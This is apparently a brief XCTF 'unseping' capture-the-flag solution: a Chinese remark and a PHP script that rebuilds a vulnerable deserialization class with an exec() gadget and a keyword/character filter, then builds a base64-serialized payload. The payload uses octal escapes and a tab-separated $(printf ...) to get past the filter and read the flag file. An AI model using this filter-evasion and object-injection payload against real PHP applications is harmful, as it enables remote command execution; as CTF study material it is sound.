xctf unseping

 php的payload如下:注意$printf后面接Tab，空格要被waf禁掉

 <?php
highlight_file(__FILE__);

class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
 
    function __destruct(){
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 
 
    function ping($ip){
        exec($ip, $result);
        var_dump($result);
    }
 
    function waf($str){
        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
            return $str;
        } else {
            echo "don't hack";
        }
    }
 
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf($v);
        }
    }   
}
$b = "cat flag_1s_here/flag_831b69012c67b35f.php";
$c = "";
for($i=0;$i<strlen($b);$i++){
	$temp_str = decoct(ord(substr($b,$i,1)));
	$c = $c."\\".$temp_str;
}
echo $c;
$c = '$(printf	"'.$c.'")';
$a = array($c);
$ctf = new ease("ping",$a);
echo base64_encode(serialize($ctf));
?>